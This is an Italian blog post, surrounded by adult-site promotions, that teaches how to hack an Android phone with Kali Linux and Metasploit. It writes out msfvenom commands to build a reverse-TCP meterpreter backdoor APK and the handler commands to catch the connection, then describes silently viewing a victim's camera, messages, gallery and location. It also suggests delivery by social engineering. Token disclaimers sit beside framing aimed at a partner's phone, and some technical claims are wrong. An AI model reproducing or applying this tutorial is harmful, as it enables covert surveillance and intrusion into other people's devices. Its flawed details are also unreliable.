Hackerare Android: Il metodo Illegale che funziona

Migliori Camgirl

CERCHI CAMGIRL ITALIANE? ECCOLE!

Magari pensi che non sia possibile o che per hackerare Android servano chissà quali competenze informatiche ma ti sbagli di grosso.

In questa guida ti mostrerò passo dopo passo come sia possibile hackerare un telefono Android con pochissimi passaggi utilizzando il sistema operativo Kali Linux e il tool Metasploit.

Cosa potrai fare hackerando uno smartphone android:

  • Accedere alla webcam del dispositivo e al suo microfono
  • Accedere ai contatti
  • Leggere le conversazioni Whatsapp e gli sms
  • Navigare tra i file di foto e video
  • Etc…

Ovviamente questo metodo è illegale se utilizzato su telefoni altrui, ma potete testarlo sul vostro dispositivo senza alcun problema.

Ripeto: questo metodo è illegale! Non cacciatevi nei guai tentando di provare sul telefono della vostra/o spasimante.

Quando non funziona questo metodo

Prima di continuare a spiegarti come hackerare Android, ci tengo a specificare che questo metodo funziona sul 90% dei telefono ma non funzionerà se il telefono vittima si connette ad internet tramite una rete VPN.

Infatti le VPN ti mettono al riparo da qualsiasi tentativo di hacking, mascherando il tuo IP filtrando e bloccando qualsiasi tentativo di intrusione.

Paradossalmente in Italia ancora in pochi utilizzano una rete VPN per connettersi ad internet, quindi dopo aver letto questo articolo probabilmente correrai anche tu ad iscriverti ad una VPN come NordVPN.

Hackerare Android: Il Sistema Operativo KALI Linux

Mai sentito parlare di Kali Linux?

Si tratta di un sistema operativo specifico per hacker che contiene al suo interno tantissimi tools gratuiti per hackerare la qualsiasi.

Con Kali Linux puoi bucare reti Wireless, siti internet, effettuare attacchi Brute Force sulle password e ovviamente hackerare Android.

Puoi scaricarlo gratuitamente dal sito ufficiale e installarlo come un normale sistema operativo. Ti consiglio ovviamente di installarlo in dual boot così da poter scegliere di volta in volta quale sistema operativo utilizzare.

Hakerare Android con Metasploit

Il Tool Metasploit è integrato all’interno di Kali Linux e puoi accedervi semplicemente digitando nella console di Kali il seguente comando:

msfconsole

Tramite Metasploit potremo generare un’App Android che sarà il nostro ‘cavallo di troia’.

Un cavallo di troia, Trojan Horse in gergo tecnico è un software che installato su un dispositivo consente ad un altro dispositivo di prenderne il controllo all'insaputa del proprietario.

Per proteggerti da attacchi del genere devi utilizzare una VPN così da criptare la tua connessione e impedire a malintenzionati di accedere ai tuoi dispositivi.

Infatti lanciando questa App sul telefono della vittima (che chiamiamo vittima per convenzione ma dovrà essere solo ed esclusivamente il tuo telefono), apriremo una porta di connessione che ci consente di prendere il totale controllo del telefono.

Creiamo l’App Android infetta

Il procedimento per la creazione dell’App android infetta, cioè contenente il codice che ci permette di entrare nel telefono della vittima, è davvero semplice.

Per prima cosa dobbiamo scoprire il nostro indirizzo ip e copiarlo negli appunti. Ci servirà più avanti.

Per questa guida dovrai conoscere sia il tuo indirizzo IP che quello della vittima. Dato che proveremo ad hackerare un nostro dispositivo all’interno della stessa rete LAN, l’indirizzo IP sarà lo stesso per entrambi.

Digita nella console questo comando:

ifconfig
Copia quindi l’indirizzo IP da qualche parte.

Adesso generiamo l’App infetta utilizzando lanciando il tool apposito MSFVenom con il codice:

msfvenom
-p android/meterpreter/reverse_tcp LHOST=(IP macchina kali) LPORT=(port number)
R > backdoored.apk

Stiamo dicendo alla macchina che vogliamo creare una App del tipo Reverse_Tcp. Questo indica il metodo che utilizzeremo per connetterci al telefono della vittima e funziona in questo modo:

  1. Il nostro PC rimane in attesa
  2. Il telefono vittima avvia l’App infetta
  3. L’app infetta avvisa il nostro PC che il telefono vittima è in ascolto
  4. Il nostro pc si connette al telefono vittima
  5. Il mondo è nelle tue mani 🙂

Ma riprendiamo un attimo il codice che ti ho scritto prima perchè vanno inserite altre variabili che ti segnalo in rosso.

 msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP macchina kali) LPORT=(port number) R > backdoor.apk 

Dovrai modificare il codice in questo modo:

  • LHOST: L’indirizzo IP del telefono vittima, cioè quello che ti sei segnato prima
  • LPORT: inserisci una numero di porta superiore a 1024. Questo perchè le porte dalla 0 a 1024 vengono utilizzate da Android invece superiore a 1024 siamo certi che sia libera.
  • R: il nome della nostra App infetta.

Adesso lancia il comando e il tool Msfvenom creerà un eseguibile Androind (cioè una vera e propria App) di nome ‘backdoor’.

Questo file dovrà essere avviato nel telefono vittima e avrà il compito di stabilire una connessione con il nostro Pc in maniera del tutto silenziosa, cioè la vittima non si accorgerà di niente.

Mettiamo in ascolto il nostro PC con Metasploit

Prima di inviare l’App infetta alla vittima, dobbiamo impostare il nostro PC in modalità ascolto.

In pratica configuriamo Metasploit su Kali Linux in attesa che la vittima lanci la nostra App infetta. Non appena lo avrà fatto in automatico prenderemo possesso del suo telefono Android!

Farlo è molto semplice, sempre la Metasploit lancia in sequenza questi comandi:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST (IP macchina attaccante)

set LPORT (port number)

In questo caso dovrai inserire il tuo IP in LHOST e il numero di porta che hai scelto prima su LHOST.

Lancia quindi il comando:

exploit 

Adesso il nostro PC sarà in ascolto e nel momento esatto in cui la vittima aprirà il file infetto verrà stabilita la connessione.

Come far avviare l’App infetta alla vittima

Questa è la parte difficile anche se nel nostro caso sarà molto semplice. Infatti, abbiamo già specificato che puoi mettere in pratica questa guida solo ed esclusivamente su dispositivi tuoi di cui hai l’autorizzazione ad accedere, altrimenti commetti reato.

Quindi ti basterà scaricare l’App infetta che hai creato prima su Kali Linux e avviarla.

Gli hacker malintenzionati invece utilizzano la cosiddetta Ingegneria Sociale, cioè metodi occulti per convincere le persone a compiere determinate azioni che hanno per l’Hacker un secondo fine.

Ad esempio, un metodo molto utilizzato è quello di includere in Stealth (cioè invisibile) l’App infetta all’interno di una immagine e inviarla via WhatsApp alla vittima. Aprendo l’immagine l’App si avvia in automatico senza che la vittima si accorga di niente.

Se ti piace l’argomento ti consiglio di leggere il libro l’Arte dell’inganno di Kevin Mitnick, il famoso Hacker che si occupa proprio di ingegneria sociale!

L'arte dell'inganno di Kevin Mitnick

amazon fba guadagnare con amazon

Il celebre pirata informatico spiega tutte le tecniche di "social engineering" che gli hanno permesso di violare sistemi di sicurezza ritenuti invulnerabili. Descrive le strategie impiegate dagli hacker, dagli agenti dello spionaggio industriale e dai criminali comuni per penetrare nelle reti. Si tratta di tecniche dell'"inganno", di espedienti per usare la buona fede, l'ingenuità o l'inesperienza delle persone che hanno accesso alle informazioni "sensibili...leggi tutta la recensione

+97 Recensioni Positive

E adesso?

Dopo aver lanciato l’App infetta, il nostro buon Metasploit effettuerà la connessione con il telefono vittima e l’intero dispositivo è nelle nostre mani!!!

Ma cosa fare adesso?

Lancia subito il comando

Help

per conoscere tutte le fantastiche cose che potrai fare dal tuo PC.

Come puoi vedere si sono molti comandi simpatici come scattare fotografie, visualizzare la galleria, leggere gli sms, localizzare il dispositivo, vedere le chiamate o addirittura iniziare uno stream video della videocamera del telefono!!

Tutto questo sarà fatto in maniera trasparente e senza che la vittima si accorga di niente!!!

Come leggere WhatsApp di nascosto

come hackeraer android

So bene immediatamente dopo aver sbirciato nella galleria della vittima, la prima cosa che cercherete di fare sarà di leggere le conversazioni WhatsApp della vittima.

Ma ti stoppo subito: per fare questo è necessario che il telefono vittima abbia il Root, cioè lo sblocco del firmware. Diversamente non c’è modo di poterlo fare!

Per verificare che il telefono sia rootato, lancia il seguente comando:

check_root

Nel caso in cui trovi conferma del root, potrai scaricare la chiave privata per decriptare le conversazioni WhatsApp.

Vuoi sapere come?

Il tuo Mr.Gold te lo spiegherà nella prossima guida, iscriviti gratuitamente alla Newsletter per essere informato subito non appena pronta, non manca molto 😉

2 commenti su “Hackerare Android: Il metodo Illegale che funziona”

  1. a me mi dice l’app è stata creata per una versione più vecchia di android e quindi potrebbe non funzionare correttamente e su metasploit non mi compare niente.

    Rispondi

Rispondi

Accedi alla Piattaforma online

COME GUADAGNARE ONLINE CON UN SITO ADULT

19 Lezioni - 100% italiano - 100% gratuito